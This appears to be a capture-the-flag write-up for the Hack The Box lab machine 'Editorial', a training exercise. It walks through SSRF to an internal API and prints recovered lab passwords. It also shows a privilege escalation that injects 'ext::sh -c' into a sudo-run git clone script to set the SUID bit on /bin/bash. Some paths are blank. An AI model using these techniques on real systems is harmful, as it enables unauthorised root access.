HTB - Editorial
Box Info
Name | Editorial |
Release Date | 15 Jun, 2024 |
OS | Linux |
Rated Difficulty | Easy |
echo “ editorial.htb” | sudo tee -a /etc/hosts
whatweb: Web: dirsearch -u http://editorial.htb/
This page is interesting, we can preview an image from a file or url.
The file name is renamed and the file extension is removed. When we open the preview image in a new tab, the file downloaded directly, so it seems like we can’t execute any shell directly.
When I upload a file and add a url “” and intercept with BurpSuite, we can see the response 200 OK and showing a image directory location, this point to a SSRF
In an SSRF attack against the server, the attacker causes the application to make an HTTP request back to the server that is hosting the application, via its loopback network interface. This typically involves supplying a URL with a hostname like
(a reserved IP address that points to the loopback adapter) or localhost
(a commonly used name for the same adapter)
The response shows us a directory path, let’s download the file and see what’s inside.
And re upload the file and add the path in burpsuite.
Username: dev - Password: dev080217_devAPI!@
Linux Enumeration
find / -user dev 2>/dev/null | grep -vE "sys|proc"
The command Git show
displays detailed information about a commit.
080217_Producti0n_2023!@ for prod
- su
- password:
Privilege Escalation
sudo -l
- echo '#!/bin/bash' > /tmp/
- echo 'chmod u+s /bin/bash' >> /tmp/
- sudo /usr/bin/python3 /opt/internal_apps/clone_changes/ "ext::sh -c '/tmp/'"
ls -l /bin/bash
Start a new bash session.
/bin/bash -p